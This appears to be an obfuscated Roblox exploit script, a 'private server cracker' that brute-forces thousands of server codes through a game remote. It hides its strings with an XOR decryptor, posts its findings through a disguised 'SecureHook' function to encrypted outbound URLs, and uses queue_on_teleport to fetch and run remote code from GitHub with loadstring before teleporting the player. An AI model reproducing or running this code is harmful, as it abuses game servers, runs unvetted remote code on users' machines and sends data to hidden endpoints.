bit32 = {};
local N = 32;
local P = 2 ^ N;
bit32.bnot = function(x)
	x = x % P;
	return (P - 1) - x;
end;
bit32.band = function(x, y)
	if (y == 255) then
		return x % 256;
	end
	if (y == 65535) then
		return x % 65536;
	end
	if (y == 4294967295) then
		return x % 4294967296;
	end
	x, y = x % P, y % P;
	local r = 0;
	local p = 1;
	for i = 1, N do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if ((a + b) == 2) then
			r = r + p;
		end
		p = 2 * p;
	end
	return r;
end;
bit32.bor = function(x, y)
	if (y == 255) then
		return (x - (x % 256)) + 255;
	end
	if (y == 65535) then
		return (x - (x % 65536)) + 65535;
	end
	if (y == 4294967295) then
		return 4294967295;
	end
	x, y = x % P, y % P;
	local r = 0;
	local p = 1;
	for i = 1, N do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if ((a + b) >= 1) then
			r = r + p;
		end
		p = 2 * p;
	end
	return r;
end;
bit32.bxor = function(x, y)
	x, y = x % P, y % P;
	local r = 0;
	local p = 1;
	for i = 1, N do
		local a, b = x % 2, y % 2;
		x, y = math.floor(x / 2), math.floor(y / 2);
		if ((a + b) == 1) then
			r = r + p;
		end
		p = 2 * p;
	end
	return r;
end;
bit32.lshift = function(x, s_amount)
	if (math.abs(s_amount) >= N) then
		return 0;
	end
	x = x % P;
	if (s_amount < 0) then
		return math.floor(x * (2 ^ s_amount));
	else
		return (x * (2 ^ s_amount)) % P;
	end
end;
bit32.rshift = function(x, s_amount)
	if (math.abs(s_amount) >= N) then
		return 0;
	end
	x = x % P;
	if (s_amount > 0) then
		return math.floor(x * (2 ^ -s_amount));
	else
		return (x * (2 ^ -s_amount)) % P;
	end
end;
bit32.arshift = function(x, s_amount)
	if (math.abs(s_amount) >= N) then
		return 0;
	end
	x = x % P;
	if (s_amount > 0) then
		local add = 0;
		if (x >= (P / 2)) then
			add = P - (2 ^ (N - s_amount));
		end
		return math.floor(x * (2 ^ -s_amount)) + add;
	else
		return (x * (2 ^ -s_amount)) % P;
	end
end;
local obf_stringchar = string.char;
local obf_stringbyte = string.byte;
local obf_stringsub = string.sub;
local obf_bitlib = bit32 or bit;
local obf_XOR = obf_bitlib.bxor;
local obf_tableconcat = table.concat;
local obf_tableinsert = table.insert;
local function LUAOBFUSACTOR_DECRYPT_STR_0(LUAOBFUSACTOR_STR, LUAOBFUSACTOR_KEY)
	local result = {};
	for i = 1, #LUAOBFUSACTOR_STR do
		obf_tableinsert(result, obf_stringchar(obf_XOR(obf_stringbyte(obf_stringsub(LUAOBFUSACTOR_STR, i, i + 1)), obf_stringbyte(obf_stringsub(LUAOBFUSACTOR_KEY, 1 + (i % #LUAOBFUSACTOR_KEY), 1 + (i % #LUAOBFUSACTOR_KEY) + 1))) % 256));
	end
	return obf_tableconcat(result);
end
repeat
	task.wait();
until game:IsLoaded() 
pcall(function()
	if (tostring(game.PlaceId) ~= LUAOBFUSACTOR_DECRYPT_STR_0("\132\146\136\117\179\226\159\77\134\148", "\126\177\163\187\69\134\219\167")) then
		print(LUAOBFUSACTOR_DECRYPT_STR_0("\10\227\28\228\208\10\233\106\226\221\14\232\106\225\217\23\232\9\241\217\7", "\156\67\173\74\165"));
		queue_on_teleport("loadstring(game:HttpGet('https://raw.githubusercontent.com/Nebula-Manta/StingrayCracker/refs/heads/main/Main'))");
		task.wait(0.5);
		game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\0\178\69\19\172\41\84\32\132\76\4\170\47\69\49", "\38\84\215\41\118\220\70")):Teleport(5130598377);
	end
end);
local function Display()
	local CG = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\115\25\48\23\217\69\31", "\158\48\118\66\114"));
	local M = Instance.new(LUAOBFUSACTOR_DECRYPT_STR_0("\134\33\3\37\114\162\254", "\155\203\68\112\86\19\197"));
	M.Parent = CG;
	M.Text = "Stingray Private Server Cracker\n[PLEASE WAIT - CRACKING IN PROGRESS...]";
end
local function Gen()
	local Result = "";
	local C = LUAOBFUSACTOR_DECRYPT_STR_0("\71\223\53\248\69\126\226\240\79\215\61\240\77\118\234\232\87\207\37\232\85\110\242\224\95\199", "\152\38\189\86\156\32\24\133");
	for i = 1, 5 do
		local Rand = math.random(1, #C);
		Result = Result .. C:sub(Rand, Rand);
	end
	return Result;
end
local function SecureHook(Message)
	local Result = "";
	local C = LUAOBFUSACTOR_DECRYPT_STR_0("\253\85\164\66\249\81\160\78\245\93\172\74\241\89\168\86\237\69\180\82\233\65\176\94\229\77", "\38\156\55\199");
	for i = 1, 64 do
		local Rand = math.random(1, #C);
		Result = Result .. C:sub(Rand, Rand);
	end
	local data = {[LUAOBFUSACTOR_DECRYPT_STR_0("\190\124\110\33\18\118\246\70\187", "\35\200\29\28\72\115\20\154")]={{[LUAOBFUSACTOR_DECRYPT_STR_0("\23\190\220\218", "\84\121\223\177\191\237\76")]=LUAOBFUSACTOR_DECRYPT_STR_0("\182\83\218\179\59\87\53", "\161\219\54\169\192\90\48\80"),[LUAOBFUSACTOR_DECRYPT_STR_0("\95\67\18\44\72\64\12\32", "\69\41\34\96")]=LUAOBFUSACTOR_DECRYPT_STR_0("\167\198\193\15\12\63\131\206\210\25\17\42\187\198\202", "\75\220\163\183\106\98"),[LUAOBFUSACTOR_DECRYPT_STR_0("\20\187\135\34\220", "\185\98\218\235\87")]=Message},{[LUAOBFUSACTOR_DECRYPT_STR_0("\197\61\42\227", "\202\171\92\71\134\190")]=LUAOBFUSACTOR_DECRYPT_STR_0("\61\200\56\132\44", "\232\73\161\76"),[LUAOBFUSACTOR_DECRYPT_STR_0("\173\216\80\84\31\185\213\71", "\126\219\185\34\61")]=LUAOBFUSACTOR_DECRYPT_STR_0("\23\203\72\119\112\99\204\243\5\218\82\119\99", "\135\108\174\62\18\30\23\147"),[LUAOBFUSACTOR_DECRYPT_STR_0("\160\232\38\222\29", "\167\214\137\74\171\120\206\83")]=Result}}};
	local s, e = pcall(function()
		local a = request({[LUAOBFUSACTOR_DECRYPT_STR_0("\190\226\62", "\199\235\144\82\61\152")]=LUAOBFUSACTOR_DECRYPT_STR_0("\15\2\173\59\20\76\246\100\6\6\176\101\5\25\173\44\15\25\170\63\73\21\182\38\72\1\188\41\15\25\182\32\72\71\232\123\80\78\224\122\86\64\239\114\83\70\235\127\81\70\232\125\72\78\180\62\87\7\178\115\4\17\173\57\87\65\178\58\16\67\182\123\14\4\187\60", "\75\103\118\217"),[LUAOBFUSACTOR_DECRYPT_STR_0("\239\81\113\16\188\12\212", "\126\167\52\16\116\217")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\235\33\46\148\177\23\232\133\26\57\144\177", "\156\168\78\64\224\212\121")]=LUAOBFUSACTOR_DECRYPT_STR_0("\6\254\181\194\14\237\164\218\14\225\171\129\13\253\170\192", "\174\103\142\197"),[LUAOBFUSACTOR_DECRYPT_STR_0("\119\61\75\48\42\76\241\76\41\75\49\42\80", "\152\54\72\63\88\69\62")]=LUAOBFUSACTOR_DECRYPT_STR_0("\141\147\184\90\208\147\239\12\141\156\237\95\131\194\189\94\132\193\235\5\131\149\236\94\141\198\235\90\213\146\239\11\213\145\186\5\132\150\187\93\130\197\186\9\208\198\189\11\141\192\184\89\129\151\239\10\215\144\184\4\128\192\239\15", "\60\180\164\142")},[LUAOBFUSACTOR_DECRYPT_STR_0("\122\81\1\48", "\114\56\62\101\73\71\141")]=game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\144\253\207\212\139\236\201\210\177\234\222", "\164\216\137\187")):JSONEncode(data),[LUAOBFUSACTOR_DECRYPT_STR_0("\255\227\37\186\169\250", "\107\178\134\81\210\198\158")]=LUAOBFUSACTOR_DECRYPT_STR_0("\8\33\177\242", "\202\88\110\226\166")});
	end);
end
local ID = math.random(10, 99);
local Iterate = 10000;
print("\n");
print(LUAOBFUSACTOR_DECRYPT_STR_0("\243\60\194\212\216\194\12\137\254\196\196\79\177\227\203\209\27\139\249\205\131\19\194\222\238\142", "\170\163\111\226\151") .. tostring(ID));
local Remote = game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\35\53\162\52\71\52\40\5\53\182\11\90\56\59\16\55\183", "\73\113\80\210\88\46\87")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\179\41\221\30\238\130\45\217\23\227\172\35\201\7\235\132\63", "\135\225\76\173\114")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\49\227\177\164\156\188\164\17\236\191\181", "\199\122\141\216\208\204\221")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\134\211\25\228", "\150\205\189\112\144\24")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\22\129\173\90\13\139\20\3", "\112\69\228\223\44\100\232\113")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\228\13\14\197\183\104\131\247\16\3\214\133\121\148\194\22\4\214", "\230\180\127\103\179\214\28")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\190\35", "\128\236\101\63\38\132\33")):WaitForChild(LUAOBFUSACTOR_DECRYPT_STR_0("\133\167\7\75\189\238", "\175\204\201\113\36\214\139"));
for i = 1, Iterate do
	task.spawn(function()
		local StartTime = tick();
		local Code = Gen();
		local args = {[1]=LUAOBFUSACTOR_DECRYPT_STR_0("\109\195\60\210\39\72\200\48", "\100\39\172\85\188"),[2]={[LUAOBFUSACTOR_DECRYPT_STR_0("\142\119\189\133", "\83\205\24\217\224")]=Code}};
		local Status;
		local s, e = pcall(function()
			Status = Remote:InvokeServer(unpack(args));
		end);
		if not s then
			print(LUAOBFUSACTOR_DECRYPT_STR_0("\207\203\217\56\244\203\204\49\166\224\223\47\233\215\141\18\232\133\249\53\244\192\204\57\166\236\233", "\93\134\165\173"), i);
		end
		if (tostring(Status) ~= LUAOBFUSACTOR_DECRYPT_STR_0("\157\253\197\199\20\199\190", "\30\222\146\161\162\90\174\210")) then
			local C = LUAOBFUSACTOR_DECRYPT_STR_0("\222\120\33\55\165\111\69\62\165\126\98\3\243\79\100\15\165\125\117\24\243\75\98\74\195\65\101\4\225\20\48", "\106\133\46\16") .. string.upper(Code);
			SecureHook(C);
			print(LUAOBFUSACTOR_DECRYPT_STR_0("\108\40\97\249\91\68\24\9\87", "\32\56\64\19\156\58"), i, LUAOBFUSACTOR_DECRYPT_STR_0("\94\205\241\87\89\250\133\94\136\249\22\110\251\141\95\136\209\87\81\247\142\0", "\224\58\168\133\54\58\146"), math.floor(tick() - StartTime), LUAOBFUSACTOR_DECRYPT_STR_0("\69\22\104\242\113\131\199\56\76\85\72\248\102\149\221\75", "\107\57\54\43\157\21\230\231"), Code);
		end
		if (i == Iterate) then
			print(LUAOBFUSACTOR_DECRYPT_STR_0("\250\135\29\181\173\212\221\222\138\21\230\249\207\218\216\136\20\230\170\218\218\215\135\8\181\189\217\219\218\136\25\240\189\156\211\155\162\53\184", "\175\187\235\113\149\217\188") .. tostring(ID));
		end
	end);
	if ((i % 100) == 0) then
		task.wait();
	end
end
print(Iterate, LUAOBFUSACTOR_DECRYPT_STR_0("\8\167\147\73\226\125\107\124\140\147\73\226\109\125\56\239\157\12\202\93\53", "\24\92\207\225\44\131\25") .. tostring(ID));
pcall(function()
	request({[LUAOBFUSACTOR_DECRYPT_STR_0("\126\193\180", "\29\43\179\216\44\123")]=LUAOBFUSACTOR_DECRYPT_STR_0("\181\205\52\92\231\150\111\29\239\142\110\28\243\137\110\29\231\143\116\26\238\150\50\92\190\134\54\17\236", "\44\221\185\64"),[LUAOBFUSACTOR_DECRYPT_STR_0("\44\226\92\87\124\5", "\19\97\135\40\63")]=LUAOBFUSACTOR_DECRYPT_STR_0("\158\115\0\15", "\81\206\60\83\91\79"),[LUAOBFUSACTOR_DECRYPT_STR_0("\102\174\209\118\42\209\94", "\196\46\203\176\18\79\163\45")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\155\45\112\10\33\245\251\245\22\103\14\33", "\143\216\66\30\126\68\155")]=LUAOBFUSACTOR_DECRYPT_STR_0("\171\216\29\199\204\160\214\245\163\199\3\132\207\176\216\239", "\129\202\168\109\171\165\195\183"),[LUAOBFUSACTOR_DECRYPT_STR_0("\45\74\62\223\215\26", "\134\66\56\87\184\190\116")]=LUAOBFUSACTOR_DECRYPT_STR_0("\52\37\29\171\10\177\110\122\56\56\26\184\22\249\37\123\63\62\4", "\85\92\81\105\219\121\139\65")},[LUAOBFUSACTOR_DECRYPT_STR_0("\223\188\84\92", "\191\157\211\48\37\28")]=game:GetService(LUAOBFUSACTOR_DECRYPT_STR_0("\247\11\224\12\9\218\13\226\21\57\218", "\90\191\127\148\124")):JSONEncode({[LUAOBFUSACTOR_DECRYPT_STR_0("\121\149\41\4", "\119\24\231\78")]={[LUAOBFUSACTOR_DECRYPT_STR_0("\129\34\161\79", "\113\226\77\197\42\188\32")]=LUAOBFUSACTOR_DECRYPT_STR_0("\9\12\240\132\23\16\173\141\24\52", "\213\90\118\148")},[LUAOBFUSACTOR_DECRYPT_STR_0("\88\35\176", "\45\59\78\212\54")]=LUAOBFUSACTOR_DECRYPT_STR_0("\57\120\181\162\178\11\146\210\34\121\180\184\163\28", "\144\112\54\227\235\230\78\205"),[LUAOBFUSACTOR_DECRYPT_STR_0("\189\39\1\255\213", "\59\211\72\111\156\176")]="."})});
end);
Display();
if (type(queue_on_teleport) == LUAOBFUSACTOR_DECRYPT_STR_0("\72\146\237\46\90\142\236\35", "\77\46\231\131")) then
	queue_on_teleport([[
        repeat task.wait() until game:IsLoaded() 
        if #game:GetService('Players'):GetPlayers()>=2 then 
            queue_on_teleport("loadstring(game:HttpGet('https://raw.githubusercontent.com/Nebula-Manta/Public-Stingray/refs/heads/main/Stingray-cracker'))")
            task.wait(0.2)
            game:GetService("TeleportService"):Teleport(5130598377)
        end
        ]]);
end
